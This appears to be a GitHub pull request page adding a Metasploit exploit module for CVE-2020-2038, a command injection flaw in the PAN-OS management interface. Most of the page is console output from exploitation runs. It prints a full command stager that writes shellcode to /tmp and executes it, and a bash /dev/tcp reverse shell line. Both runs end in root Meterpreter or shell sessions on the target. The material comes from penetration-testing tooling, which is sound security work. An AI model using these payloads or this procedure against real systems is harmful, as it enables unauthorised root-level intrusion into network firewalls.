metasploit-framework
metasploit-framework copied to clipboard
rapid7
Add PAN-OS auth command injection module (CVE-2020-2038)
An OS Command Injection vulnerability in the PAN-OS management interface that allows authenticated administrators to execute arbitrary OS commands with root privileges. More info: https://swarm.ptsecurity.com/swarm-of-palo-alto-pan-os-vulnerabilities/
This PR adds a fairly straight forward module to exploit the command injection vulnerability mentioned above and return a meterpreter session.
Verification
List the steps needed to make sure this thing works
- [ ] Start
msfconsole - [ ]
use exploit/linux/http/panos_auth_rce - [ ] Set the
RHOST,USERNAME, andPASSWORDoptions - [ ] Run the module
- [ ] Verify the api key is obtained successfully
- [ ] Receive a meterpreter session
|[*] Using configured payload linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/http/panos_auth_rce) > set rhosts 192.168.2.196
rhosts => 192.168.2.196
msf6 exploit(linux/http/panos_auth_rce) > set USERNAME admin
USERNAME => admin
msf6 exploit(linux/http/panos_auth_rce) > set PASSWORD N0tpassword!
PASSWORD => N0tpassword!
msf6 exploit(linux/http/panos_auth_rce) > run
[*] Started reverse TCP handler on 192.168.2.114:4444
[*] Authenticating...
[+] Successfully obtained api key
[*] Exploiting...
[*] Sending stage (3020772 bytes) to 192.168.2.196
[*] Meterpreter session 1 opened (192.168.2.114:4444 -> 192.168.2.196:51132) at 2022-08-16 09:01:47 -0400
[*] Command Stager progress - 100.00% done (1326/1326 bytes)
f
meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer : PA-VM-10-0-0.home
OS : Red Hat (Linux 3.10.0-957.21.3.10.pan.x86_64)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter >
Removing assignment. @jheysel-r7 et al, feel free to grab this one since I'm on research now.
Thanks for the updates @jheysel-r7! Everything looks good to me now. I tested against PAN-OS 9.1.3 and verified it works with both targets. I'll go ahead and land it.
- Example output
msf6 exploit(linux/http/panos_op_cmd_exec) > exploit lhost=10.0.0.19 rhosts=10.0.0.76 verbose=true USERNAME=msfuser PASSWORD=12345678
[*] Started reverse TCP handler on 10.0.0.19:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Authenticating...
[+] Successfully obtained api key
[+] The target appears to be vulnerable.
[*] Exploiting...
[*] Generated command stager: ["echo -en \\\\x7f\\\\x45\\\\x4c\\\\x46\\\\x02\\\\x01\\\\x01\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x02\\\\x00\\\\x3e\\\\x00\\\\x01\\\\x00\\\\x00\\\\x00\\\\x78\\\\x00\\\\x40\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x40\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x40\\\\x00\\\\x38\\\\x00\\\\x01\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x01\\\\x00\\\\x00\\\\x00\\\\x07\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x40\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x40\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xfa\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x7c\\\\x01\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x10\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x48\\\\x31\\\\xff\\\\x6a\\\\x09\\\\x58\\\\x99\\\\xb6\\\\x10\\\\x48\\\\x89\\\\xd6\\\\x4d\\\\x31\\\\xc9\\\\x6a\\\\x22\\\\x41\\\\x5a\\\\xb2\\\\x07\\\\x0f\\\\x05\\\\x48\\\\x85\\\\xc0\\\\x78\\\\x51\\\\x6a\\\\x0a\\\\x41\\\\x59\\\\x50\\\\x6a\\\\x29\\\\x58\\\\x99\\\\x6a\\\\x02\\\\x5f\\\\x6a\\\\x01\\\\x5e\\\\x0f\\\\x05\\\\x48\\\\x85\\\\xc0\\\\x78\\\\x3b\\\\x48\\\\x97\\\\x48\\\\xb9\\\\x02\\\\x00\\\\x11\\\\x5c\\\\xc0\\\\xa8\\\\x01\\\\x13\\\\x51\\\\x48\\\\x89\\\\xe6\\\\x6a\\\\x10\\\\x5a\\\\x6a\\\\x2a\\\\x58\\\\x0f\\\\x05\\\\x59\\\\x48\\\\x85\\\\xc0\\\\x79\\\\x25\\\\x49\\\\xff\\\\xc9\\\\x74\\\\x18\\\\x57\\\\x6a\\\\x23\\\\x58\\\\x6a\\\\x00\\\\x6a\\\\x05\\\\x48\\\\x89\\\\xe7\\\\x48\\\\x31\\\\xf6\\\\x0f\\\\x05\\\\x59\\\\x59\\\\x5f\\\\x48\\\\x85\\\\xc0\\\\x79\\\\xc7\\\\x6a\\\\x3c\\\\x58\\\\x6a\\\\x01\\\\x5f\\\\x0f\\\\x05\\\\x5e\\\\x6a\\\\x7e\\\\x5a\\\\x0f\\\\x05\\\\x48\\\\x85\\\\xc0\\\\x78\\\\xed\\\\xff\\\\xe6>>/tmp/dilJm ; chmod 777 /tmp/dilJm ; /tmp/dilJm ; rm -f /tmp/dilJm"]
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3020772 bytes) to 10.0.0.76
[*] Meterpreter session 2 opened (10.0.0.19:4444 -> 10.0.0.76:42514) at 2022-09-15 17:36:03 +0200
[*] Command Stager progress - 100.00% done (1326/1326 bytes)
meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer : PA-VM.None
OS : Red Hat (Linux 3.10.0-957.21.3.10.pan.x86_64)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter > [*] Shutting down Meterpreter...
[*] 10.0.0.76 - Meterpreter session 2 closed. Reason: Died
msf6 exploit(linux/http/panos_op_cmd_exec) > set target 1
target => 1
msf6 exploit(linux/http/panos_op_cmd_exec) > exploit lhost=10.0.0.19 rhosts=10.0.0.76 verbose=true USERNAME=msfuser PASSWORD=12345678
[+] bash -c '0<&81-;exec 81<>/dev/tcp/10.0.0.19/4444;sh <&81 >&81 2>&81'
[*] Started reverse TCP handler on 10.0.0.19:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Authenticating...
[+] Successfully obtained api key
[+] The target appears to be vulnerable.
[*] Exploiting...
[*] Command shell session 3 opened (10.0.0.19:4444 -> 10.0.0.76:42554) at 2022-09-15 17:37:09 +0200
id
uid=0(root) gid=0(root) groups=0(root)
Release Notes
This adds an exploit module that leverages an OS Command Injection vulnerability in the PAN-OS management interface versions 10.0 to 10.0.1, versions 9.1.0 to 9.1.4 and version 9.0.0 to 9.0.10. This vulnerability is identified as CVE-2020-2038 and allows authenticated administrators to execute arbitrary OS commands with root privileges.